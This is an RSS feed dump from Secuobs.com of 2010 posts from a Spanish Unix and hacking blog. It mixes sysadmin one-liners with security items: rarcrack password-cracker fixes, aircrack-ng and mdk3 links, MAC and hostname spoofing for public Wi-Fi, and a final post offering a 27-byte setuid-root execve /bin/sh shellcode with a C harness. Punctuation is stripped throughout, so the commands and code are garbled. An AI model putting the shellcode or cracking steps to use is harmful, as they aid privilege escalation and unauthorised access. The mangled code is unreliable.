<item><title>Dstat  Versatile resource statistics tool</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  - Dstat is a versatile replacement for vmstat, iostat, netstat and ifstat Dstat overcomes some of their limitations and adds some extra features, more counters and flexibility Dstat is handy for monitoring systems during performance tuning tests, benchmarks or troubleshooting Dstat allows you to view all of your system resources in real-time, you can eg compare disk utilization in combination with interrupts from your IDE controller, or compare the network bandwidth numbers directly with the disk throughput  in the same interval  Mola   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249665.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249665.shtml</guid></item>
<item><title>Falsos positivos en rarcrack</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  - A mi rarcrack me estaba dando falsos positivos, asi que esto es lo que hice  Comprobar la cadena que devuelve el rar de ejemplo al pasarle un password correcto    unrar t -y -p100 testrar UNRAR 390 beta 2 freeware      Copyright  c  1993-2009 Alexander Roshal Testing archive testrar Testing     LICENSE                                                   OK  All OK Esa es la cadena   All OK   Editar rarcrackc  Sustituir  if  strcasestr ret,  ok    NULL    por if  strstr ret,  All OK    NULL    La funcion strcasestr no es sensible a mayusculas   minusculas, no esta optimizada Cambiar por strstr  Compilar de nuevo  make sudo make install De todas formas es leeeeeento este rarcrack Como alternativa tenemos por ejemplo a cRARk  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249664.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249664.shtml</guid></item>
<item><title>aircrack-ng GUI</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  - Unos enlaces para tenerlo a mano http forumaircrack-ngorg indexphp topic 63290 WepCrackGui mdk3 sudo aptitude install aircrack-ng monodevelop  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249663.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249663.shtml</guid></item>
<item><title>EDB  Evan's Debugger </title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  - EDB  Evan's Debugger  is a Qt4 based binary mode debugger with the goal of having usability on par with OllyDbg It uses a plugin architecture, so adding new features can be done with ease The current release is for Linux, but future releases will target more platforms http freshmeatnet projects edebugger  http wwwcodef00com projectsphp debugger  IMAGE  Una alternativa a gdb que tengo que probar   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249662.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249662.shtml</guid></item>
<item><title>Facebook Secure Pro  https in Facebook by default </title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  - Forces Facebook to use secure login and connections all the time That is always encrypted SSL  https  except for photos and videos This is a good idea especially if you are on a shared computer or a network not controlled by yourself Para instalarlo necesitas  -Firefox - y Greasemonkey Entonces basta pulsar en Install  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249661.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249661.shtml</guid></item>
<item><title>ExifTool by Phil Harvey Read, Write and Edit Meta Information </title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  - ExifTool is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files ExifTool supports many different metadata formats including EXIF, GPS, IPTC, XMP, JFIF, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP and ID3, as well as the maker notes of many digital cameras by Canon, Casio, FujiFilm, HP, JVC Victor, Kodak, Leaf, Minolta Konica-Minolta, Nikon, Olympus Epson, Panasonic Leica, Pentax Asahi, Ricoh, Samsung, Sanyo, Sigma Foveon and Sony Simplemente impresionante herramienta para trabajar con metadatos http wwwsnophyqueensuca phil exiftool   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249660.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249660.shtml</guid></item>
<item><title>El peligro de las  flash -cookies</title><description>Secuobs.com : 2010-09-20 07:03:14 -  Unix   Cisco   Hacks  - Examinando con la genial extension Live HTTP Headers lo que mandaba mi navegador a una web determinada, me encontre con lo siguiente  POST  mochiSWF Referer  http mochibotcom my coreswf mv 5 fv 7 v LNXpourcents2010pourcents2C1pourcents2C82pourcents2C76 swfid 46030122 l 10301 f level0 sb remote Content-Type  application x-www-form-urlencoded Content-Length  766 pourcents5Fpourcents5Fmochibot pourcents5Btype Functionpourcents5D TAG 46030122 SV 7 MV 5 REF sb remote f pourcents5Flevel0 l 10301 swfid 46030122 v LNX 10pourcents2C1pourcents2C82pourcents2C76 fv 7 mv 5 lv pourcents5Flevel0pourcents2Epourcents5Fpourcents5Fmochibotpourcents5Fpourcents5F46030122pourcents2Elv GUID ebda978824f0903ca606498e5d96d3d5 SH 32 SW 1072 T 4756 TZ pourcents2D120 URL httppourcents3Apourcents2Fpourcents2Frisperpourcents2Edlnetpourcents2Eorgpourcents2Fxspfpourcents5Fplayerpourcents5Fslimpourcents2Eswfpourcents3Fsongpourcents5Furlpourcents3Dlimolifepourcents2Emp3 Q HIGH BL 208197 BT 208197 ACC 1 SC Apourcents3Dtpourcents26SApourcents3Dtpourcents26SVpourcents3Dtpourcents26EVpourcents3Dtpourcents26MP3pourcents3Dtpourcents26AEpourcents3Dtpourcents26VEpourcents3Dtpourcents26ACCpourcents3Dfpourcents26PRpourcents3Dtpourcents26SPpourcents3Dfpourcents26SBpourcents3Dfpourcents26DEBpourcents3Dfpourcents26Vpourcents3DLNXpourcents252010pourcents252C1pourcents252C82pourcents252C76pourcents26Mpourcents3DAdobepourcents2520Linuxpourcents26Rpourcents3D1680x1050pourcents26COLpourcents3Dcolorpourcents26ARpourcents3D0pourcents2C998198pourcents26OSpourcents3DLinuxpourcents25202pourcents2E6pourcents2E32pourcents2D5pourcents2Damd64pourcents26ARCHpourcents3Dx86pourcents26Lpourcents3Despourcents26PR32pourcents3Dtpourcents26PR64pourcents3Dtpourcents26PTpourcents3DPlugInpourcents26AVDpourcents3Dfpourcents26LFDpourcents3Dfpourcents26WDpourcents3Dfpourcents26TLSpourcents3Dtpourcents26MLpourcents3D5pourcents2E1pourcents26DPpourcents3D72 Todo eso estaba mandando mi navegador al servidor de mochibot, de forma totalmente transparente para mi Investigando di con el SWF culpable  un fork del genial xspf musicplayer Tengo una debian sid con flare y una palabra clave  mochibot Let's give a shot frame 1   function playerLoad    __com_mochibot__ '46030122', this, 10301  fillColor  fillDefaults  fillOther    function __com_mochibot__ swfid, mc, lv    var x  var g  var s  var fv  var sb  var u  var res  var mb  var mbc  mb   '__mochibot__'  mbc   'mochibotcom'  g   _global   _global   _level0_root  if  g mb   swfid    return g mb   swfid    s   Systemsecurity  x   mc_rootgetSWFVersion  fv   x   mcgetSWFVersion     global   6   5  if  s    s       sb   ssandboxType  if  sb   'localWithFile'    return null    x   sallowDomain  if  x    sallowDomain mbc    x   sallowInsecureDomain  if  x    sallowInsecureDomain mbc    u   'http '   mbc   ' my coreswf mv 5 fv '   fv   ' v '   escape version    ' swfid '   escape swfid    ' l '   lv   ' f '   mc    sb   ' sb '   sb   ''  lv   fv  6   mcgetNextHighestDepth     g mb   'level'    g mb   'level'    1   lv  g mb   'level'    lv  if  fv   5    res   '_level'   lv  if  eval res    loadMovieNum u, lv    return res    res   mccreateEmptyMovieClip mb   swfid, lv  resloadMovie u  return res    Eso es lo que esta chivandose de nosotros a mochibot Despues me di cuenta de que el fork es open source, y yo trasteando con flare para encontrar el bicho El caso es que reemplazando los SWF  maliciosos  por los swf originales de sourceforge todo solucionado Pongo maliciosos entre comillas porque es de gran ayuda en una investigacion cualquier rastro, pero nosotros no somos criminales y no queremos dejar rastro Bueno, seamos realistas, hasta donde podamos queremos defender nuestra privacidad en la red todo lo posible Por cierto, una extension de FF que elimina cookies Flash es BetterPrivacy, muy recomendable Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/249659.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249659.shtml</guid></item>
<item><title>Obtener una cita de Fry  Futurama  desde la shell</title><description>Secuobs.com : 2010-08-02 01:13:36 -  Unix   Cisco   Hacks  -    curl -Is slashdotorg grep X-F sed 's X- ' Antes los folks de slashdot incluian tambien un campo X-Bender en las cabeceras HTTP Por desgracia la quitaron, y ahora solo envian a cada peticion la cabecera X-Fry Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/245746.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/245746.shtml</guid></item>
<item><title>MAME for ubuntu linux</title><description>Secuobs.com : 2010-08-02 01:13:36 -  Unix   Cisco   Hacks  - Lo reconozco, cuando era chaval pasaba vicios en los salones recreativos Por aquel entonces era mas o menos normal, hoy todo el mundo se rie cuando oye que gastabas 25 pts en una partida, y que tu vicio empezo cuando descubriste el ghost'n'goblins o el dragon's lair en version laserdisc Pues para Ubuntu  Debian podria ser OK  aqui tenemos una pagina que explica muy bien como implementar MAME en Ubuntu Para jugar gratis ya no hay que usar harcktefactos como una pieza que traian las neveras antiguas que apretabas, hacia clic y metias un chispazo por donde se metia la moneda en la maquina Y credits gratis señores   Un saludo  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/245745.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/245745.shtml</guid></item>
<item><title>maybe you're here</title><description>Secuobs.com : 2010-08-01 06:37:50 -  Unix   Cisco   Hacks  -    lynx -dump  http wwwgeoiptoolcom IP curl ifconfigme  egrep 'IP AddressCountryRegionCity'  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/245721.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/245721.shtml</guid></item>
<item><title>Lo primero que hay que hacer en redes WIFI publicas</title><description>Secuobs.com : 2010-08-01 02:06:44 -  Unix   Cisco   Hacks  - Nos cambiamos el hostname, clonamos la MAC y forzamos un DHCP-renew   dhclient -r   rm -f  var lib dhcp3 dhclient    sed  s hostname v7 g  -i  etc hosts   hostname  echo  RANDOM md5sum cut -c 1-7 tr a-z A-Z    sed  s v7 hostname g  -i  etc hosts   macchanger -A wlan0   dhclient Y lo siguiente a hacer de ti depende Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/245705.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/245705.shtml</guid></item>
<item><title>SASL   TOR en Freenode</title><description>Secuobs.com : 2010-07-29 13:55:21 -  Unix   Cisco   Hacks  -  TOR a traves de SOCKS   etc initd tor start socat TCP4-LISTEN 7777,fork SOCKS4A 127001 p4fsi4ockecnea7lonion 6667,socksport 9050   El _unico_ nodo de salida TOR autorizado por Freenode puede verse lanzando la siguiente consulta  dig  short irctorfreenodenet cname  Instalar SASL  mkdir -p  irssi scripts autorun wget http wwwfreenodenet sasl cap_saslpl -P  irssi scripts  ln -s  irssi scripts cap_saslpl  irssi scripts autorun   Habilitar SASL en irssi   server add -ssl -network freenodetor localhost 7777  load perl  sasl set freenodetor tu_nick tu_password DH-BLOWFISH  sasl save  save  Comprobar  irssi config    address    localhost  chatnet    freenodetor  port    7777  use_ssl    no  ssl_verify    no  autoconnect    no     Having fun torify irssi  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/245005.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/245005.shtml</guid></item>
<item><title>Print your blog Blog to PDF  II </title><description>Secuobs.com : 2010-07-27 02:13:17 -  Unix   Cisco   Hacks  - Empezo siendo gratuito obetener el PDF, despues lo hicieron de pago, y aqui decidi no decir que en la cache del navegador se podia encontrar el PDF Bien, acabo de probarlo de nuevo, y ahora guarda en la cache un PDF por pagina, un engorro Asi que, antes de hacer trampas, he probado otras alternativas como rss2pdf, aunque con esta ultima no he conseguido imprimir las imagenes, ni siquiera jugando con firebug para alterar las opciones validadas en el lado del cliente Bueno, a base de probar cosas he conseguido bajar el pdf registrandome, guardando el pdf con las imagenes por defecto de portada y contraportada, logeandome, cambiando las imagenes y seleccionando guardar el blog en PDF Gracias, PD El PDF del blog actualizado a dia de hoy podeis encontrarlo AQUI  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/244088.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/244088.shtml</guid></item>
<item><title>Analisis Forense de routers Cisco</title><description>Secuobs.com : 2010-07-18 22:04:27 -  Unix   Cisco   Hacks  -      terminal length 0   dir  all   show clock detail   show ntp   show version   show running-config   show startup-config   show reload   show ip route   show ip arp   show users   show logging   show interfaces   show ip interfaces   show access-lists   show tcp brief all   show ip sockets   show ip nat translations verbose   show ip cache flow   show ip cef   show snmp users   show snmp groups   show clock detail   exit  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/241517.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/241517.shtml</guid></item>
<item><title>Personalizando Backtrack</title><description>Secuobs.com : 2010-07-17 21:25:10 -  Unix   Cisco   Hacks  - Simplemente para tener el enlace del script a mano  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/241396.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/241396.shtml</guid></item>
<item><title>Bot IRC que dice titulos de youtubes que escriben los usuarios</title><description>Secuobs.com : 2010-07-15 08:26:27 -  Unix   Cisco   Hacks  -     bin bash     v01   15-7-2010      vlan7   http wwwvlan7org NICK vlan7bot SERVER 1 -duneirc-hispanoorg  CANAL 2 - canal  echo  NICK  NICK  input echo  USER  NICK  NICK  NICK  0  input tail -f input  telnet  SERVER 6667    while true do read LINE  break echo  LINE if echo  LINE grep  PING   dev null then echo  PONG  LINE  input echo  JOIN  CANAL  input  sacar esto de aqui  echo  MODE  NICK  c  input  sacar esto de aqui  fi if echo  LINE grep -i  youtubecom   dev null then LINE echo  LINE grep -o  wwwyoutube    echo  PRIVMSG  CANAL    curl  LINEpourcents  2 1 grep -iA2 '' grep '-' sed 's -  '  input fi done Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/240727.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/240727.shtml</guid></item>
<item><title>CLI tools for the Google Data APIs</title><description>Secuobs.com : 2010-07-10 10:56:45 -  Unix   Cisco   Hacks  - http codegooglecom p googlecl  Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/239369.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/239369.shtml</guid></item>
<item><title>Query Wikipedia via console over DNS</title><description>Secuobs.com : 2010-07-09 17:58:00 -  Unix   Cisco   Hacks  -    dig  short txt wpdgcx Credits  drizzt En windows  nslookup -q txt wpdgcx  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/239157.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/239157.shtml</guid></item>
<item><title>Parecido a top pero para archivos</title><description>Secuobs.com : 2010-07-09 16:07:58 -  Unix   Cisco   Hacks  -    watch -d -n 3 'df  ls -FlAt '  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/239118.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/239118.shtml</guid></item>
<item><title>Analizadores de vulnerabilidades</title><description>Secuobs.com : 2010-06-26 19:37:21 -  Unix   Cisco   Hacks  - chanchi me envia un PDF sobre analizadores de vulnerabilidades, practico en sus propios sistemas Ahi va el enlace Gracias chanchi, para la proxima queremos metasploit    IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/235389.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/235389.shtml</guid></item>
<item><title>Obtener IP publica desde shell unix</title><description>Secuobs.com : 2010-06-26 09:13:43 -  Unix   Cisco   Hacks  -    curl ipappspotcom Solo nos devuelve la ip Simple y efectivo  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/235330.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/235330.shtml</guid></item>
<item><title>Restablecer menu Lugares en gnome</title><description>Secuobs.com : 2010-06-25 16:19:04 -  Unix   Cisco   Hacks  - Recientemente actualice una ubuntu 910 a la 1004, y se me fue a tomar viento el menu Lugares Hacia clic en algun elemento y no sucedia nada Lo solucione asi  gconftool-2 --set --type string  desktop gnome url-handlers file command 'nautilus  pourcentss ' gconftool-2 --set --type bool  desktop gnome url-handlers file enabled true gconftool-2 --set --type bool  desktop gnome url-handlers file need-terminal false  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/235085.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/235085.shtml</guid></item>
<item><title>DIGITAL FORENSIC WAR GAME</title><description>Secuobs.com : 2010-05-07 02:07:47 -  Unix   Cisco   Hacks  - Me entero por un compañero de uno de mis foros favoritos, Wadalbertia, de este wargame de forense Los 2 primeros niveles son asequibles, el reto esta bien, aunque me temo que el tercer nivel se me va a resistir, si es que consigo pasarlo claro Ahi va la URL  http real-forensiccom  Suerte   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/219677.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/219677.shtml</guid></item>
<item><title>RootedCON's Presentations</title><description>Secuobs.com : 2010-03-29 13:54:21 -  Unix   Cisco   Hacks  - Para los que no tuvimos la suerte de poder asistir a la RootedCON, y tambien para los que pudisteis pasaros por alli y querais echarles un ojo, me entero por uno de mis foros favoritos de que se han colgado las presentaciones aqui  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/206441.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/206441.shtml</guid></item>
<item><title> dev tcp en Ubuntu 910 karmic</title><description>Secuobs.com : 2010-03-11 19:49:00 -  Unix   Cisco   Hacks  - Basicamente hay que recompilar bash con la opcion --enable-net-redirections Para despues proceder a crear los dispositivos  dev tcp y  dev udp con sus correspondientes valores   Create  dev tcp and  dev udp devices  usr bin sudo mknod  dev tcp c 30 36  usr bin sudo mknod  dev udp c 30 39 Y testearlo   Test cat  dev tcp timenistgov 13   echo 'All ok Enjoy ' Como no voy a reinventar la rueda, he adaptado el script que se puede encontrar en los comentarios de esta entrada del Linux Journal Mas que nada porque he cambiado recientemente a ubuntu 910 y me interesaba practicar el segundo PDF de las Ninjitsu Series, que trata basicamente de usar netcat  sin usar netcat  Ahi va el script   bin bash   Written by Joseph E Tole 09 29 09   Updated by G Geurts 09 30 09   Updated by vlan7 03 11 10    dev tcp on Ubuntu   Tested against Ubuntu 910 x64, bash 40x   Enjoy    This creates and then changes to a new temporary directory mktemp should always be used to avoid accidently using an active file dir bash_source bin mktemp -d  cd  bash_source    Install the bash source apt-get source bash   Dependencies   The -y flag causes apt-get to assume you said yes and not prompt for y n to install  usr bin sudo apt-get build-dep -y bash  usr bin sudo apt-get install -y dpkg-dev fakeroot cd bash-    This line changes the rules file which has the configure script options predefined in it This causes the compile to now include network support  bin sed -e 's --disable-net-redirections --enable-net-redirections ' -i debian rules   This creates new deb packages for bash which is several but we only need to install one since the others are copies of what is already installed  usr bin dpkg-buildpackage -rfakeroot   Install the deb The asterisk is used for architecture independence In my case it   matches _amd64 but this may be different on non x64 systems  usr bin sudo  usr bin dpkg -i  bash_ deb   The line below puts bash on hold within the package manager so that it is not automatically upgraded If it is then you will lose this functionality echo 'bash hold'   usr bin sudo  usr bin dpkg --set-selections  Create  dev tcp and  dev udp devices  usr bin sudo mknod  dev tcp c 30 36  usr bin sudo mknod  dev udp c 30 39  Test cat  dev tcp timenistgov 13   echo 'All ok Enjoy ' Suerte   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/200768.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/200768.shtml</guid></item>
<item><title>Saber si una web esta caida Errorzilla</title><description>Secuobs.com : 2010-02-27 14:46:52 -  Unix   Cisco   Hacks  -  Errorzilla is a FF extension that  Implements a useful error page when a website cannot be reached Will add Try Again, Google Cache, Coralize, Wayback, Ping, Trace, and Whois buttons, along with the Firefox logo to the error page when a website isn't found or a web server is down  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/196263.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/196263.shtml</guid></item>
<item><title>psshutdown Error the pipe has been ended</title><description>Secuobs.com : 2010-02-25 13:08:51 -  Unix   Cisco   Hacks  - Al actualizar psshutdown, me encontre con este error  Error communicating with psshutdown service on local system The system may not have been shutdown  The pipe has been ended Bien, la manera de trabajar de psshutdown es instalar un servicio en la maquina remota a apagar Por alguna razon, ese servicio no se desinstalo correctamente, asi que esta fue mi solucion  sc delete PsShutdownSvc del pourcentswindirpourcents pssdnsvcexe Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/195510.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/195510.shtml</guid></item>
<item><title>Print your blog Blog to pdf</title><description>Secuobs.com : 2010-02-25 13:08:51 -  Unix   Cisco   Hacks  - http blog2printsharedbookcom blogworld printmyblog indexhtml Cuesta dinero incluso obtener el PDF, pero no dire que se puede encontrar el PDF en la cache del navegador Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/195509.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/195509.shtml</guid></item>
<item><title>Black Hat Europe 2010  Welcome Barcelona, Spain   Apr 12 - 15</title><description>Secuobs.com : 2010-02-17 17:34:13 -  Unix   Cisco   Hacks  -     IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/192775.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/192775.shtml</guid></item>
<item><title>tHE HTML packer</title><description>Secuobs.com : 2010-02-16 04:56:55 -  Unix   Cisco   Hacks  -     IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/192200.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/192200.shtml</guid></item>
<item><title> Hacking Techniques, Exploits   Incident Handling  de SANS en Madrid</title><description>Secuobs.com : 2010-02-11 18:55:48 -  Unix   Cisco   Hacks  -     IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/190986.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/190986.shtml</guid></item>
<item><title>Speed Up the Web</title><description>Secuobs.com : 2010-02-04 17:20:25 -  Unix   Cisco   Hacks  -     IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/188594.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/188594.shtml</guid></item>
<item><title>Defrag Firefox sqlite3 db</title><description>Secuobs.com : 2010-02-04 16:11:06 -  Unix   Cisco   Hacks  -     IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/188574.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/188574.shtml</guid></item>
<item><title>Privacy Security Freedom</title><description>Secuobs.com : 2010-02-03 18:42:01 -  Unix   Cisco   Hacks  -     IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/188225.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/188225.shtml</guid></item>
<item><title>Online image optimizer</title><description>Secuobs.com : 2010-02-03 16:22:15 -  Unix   Cisco   Hacks  -     IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/188154.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/188154.shtml</guid></item>
<item><title>Bajar albumes de Picasa  II </title><description>Secuobs.com : 2010-02-02 22:57:41 -  Unix   Cisco   Hacks  -  IMAGE  </description><link>http://www.secuobs.com/revue/news/187878.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/187878.shtml</guid></item>
<item><title>Bajar albumes de Picasa</title><description>Secuobs.com : 2010-02-02 21:27:27 -  Unix   Cisco   Hacks  -  IMAGE  </description><link>http://www.secuobs.com/revue/news/187848.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/187848.shtml</guid></item>
<item><title> Unix   Cisco   Hacks  </title><description>Secuobs.com : 2010-02-02 01:07:30 -  Unix   Cisco   Hacks  -  IMAGE  </description><link>http://www.secuobs.com/revue/news/187509.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/187509.shtml</guid></item>
<item><title>Jugando con metadatos</title><description>Secuobs.com : 2010-02-01 06:41:38 -  Unix   Cisco   Hacks  -  IMAGE  </description><link>http://www.secuobs.com/revue/news/187170.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/187170.shtml</guid></item>
<item><title>Windows 31 online</title><description>Secuobs.com : 2010-01-30 16:54:25 -  Unix   Cisco   Hacks  -  IMAGE  </description><link>http://www.secuobs.com/revue/news/186981.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/186981.shtml</guid></item>
<item><title>Ejecutar el ultimo comando como root</title><description>Secuobs.com : 2010-01-30 16:54:25 -  Unix   Cisco   Hacks  -  IMAGE  </description><link>http://www.secuobs.com/revue/news/186980.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/186980.shtml</guid></item>
<item><title>Ultimo recurso  botonazo Penultimo recurso  magia</title><description>Secuobs.com : 2010-01-30 16:54:25 -  Unix   Cisco   Hacks  -  IMAGE  </description><link>http://www.secuobs.com/revue/news/186979.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/186979.shtml</guid></item>
<item><title>Buscando en la www a lo friki</title><description>Secuobs.com : 2010-01-29 23:23:23 -  Unix   Cisco   Hacks  -  IMAGE  </description><link>http://www.secuobs.com/revue/news/186805.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/186805.shtml</guid></item>
<item><title>Obtener cookies desde bash</title><description>Secuobs.com : 2010-01-28 17:14:44 -  Unix   Cisco   Hacks  -  IMAGE  </description><link>http://www.secuobs.com/revue/news/186291.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/186291.shtml</guid></item>
<item><title>Ejecutar un comando en bash que no aparezca en el historial</title><description>Secuobs.com : 2010-01-27 18:33:46 -  Unix   Cisco   Hacks  -  IMAGE  </description><link>http://www.secuobs.com/revue/news/185925.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/185925.shtml</guid></item>
<item><title>perl  Editando Añadiendo mirrors de CPAN</title><description>Secuobs.com : 2010-01-27 15:18:11 -  Unix   Cisco   Hacks  -  IMAGE  </description><link>http://www.secuobs.com/revue/news/185835.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/185835.shtml</guid></item>
<item><title>Actualizar modulos CPAN instalados</title><description>Secuobs.com : 2010-01-27 15:18:11 -  Unix   Cisco   Hacks  -  IMAGE  </description><link>http://www.secuobs.com/revue/news/185834.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/185834.shtml</guid></item>
<item><title>Do some Perl learning</title><description>Secuobs.com : 2010-01-27 15:18:11 -  Unix   Cisco   Hacks  -  IMAGE  </description><link>http://www.secuobs.com/revue/news/185833.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/185833.shtml</guid></item>
<item><title>Do some learning</title><description>Secuobs.com : 2010-01-27 15:18:11 -  Unix   Cisco   Hacks  -  IMAGE  </description><link>http://www.secuobs.com/revue/news/185832.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/185832.shtml</guid></item>
<item><title>Smallest  27 bytes  GNU Linux x86 setuid execve shellcode without NULLs</title><description>Secuobs.com : 2010-01-22 02:04:21 -  Unix   Cisco   Hacks  - Como no sabia que era imposible lo hice 27 bytes     include  const char sc   x31 xdb   xor ebx,ebx  x8d x43 x17   LEA eax, ebx   0x17   LEA is FASTER than push pop   x99   cdq  xcd x80   int 80  setuid 0  should returns 0 right     xb0 x0b   mov al,0bh  x52   push edx  Termina la cadena  bin sh con un 0  x68 x6e x2f x73 x68   push dword  hs n   x68 x2f x2f x62 x69   push dword  ib   x89 xe3   mov ebx,edx  x89 xd1   mov ecx,edx  xcd x80   int 80h int main    printf nSMALLEST SETUID   EXECVE GNU LINUX x86 STABLE SHELLCODE    WITHOUT NULLS THAT SPAWNS A SHELL   n nCoded by vlan7   n t   vlan7 at bigfootcom   n t   http vlan7blogspotcom   n n  Date  4 Jul 2009   n  Thanks to  sch3m4   n n  Shellcode Size  pourcentsd bytes n n , sizeof sc -1   void   sc  return 0    Voy a citar de aqui el funcionamiento de setuid  RETURN VALUE Upon successful completion, 0 shall be returned Otherwise, -1 shall be returned and errno set to indicate the error ERRORS The setuid  function shall fail, return -1, and set errno to the corresponding value if one or more of the following are true  Veamos si entramos en alguno de los casos   EINVAL  The value of the uid argument is invalid and not supported by the implementation No UID 0 es un UID valido Es el r00t   EPERM  The process does not have appropriate privileges and uid does not match the real user ID or the saved set-user-ID Logicamente, esto ultimo puede pasar en la version a la que se llego anteriormente Ah, y aqui el hilo de Wadalbertia  Smallest GNU Linux x86 setuid execve shellcode without NULLs Stay clean,  IMAGE  </description><link>http://www.secuobs.com/revue/news/184269.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/184269.shtml</guid></item>
